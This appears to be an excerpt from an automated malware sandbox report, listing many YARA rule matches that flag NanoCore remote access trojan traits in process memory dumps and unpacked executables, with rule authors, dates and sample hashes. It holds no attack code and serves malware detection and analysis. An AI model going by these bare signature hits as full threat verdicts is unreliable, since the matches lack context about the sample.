        Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
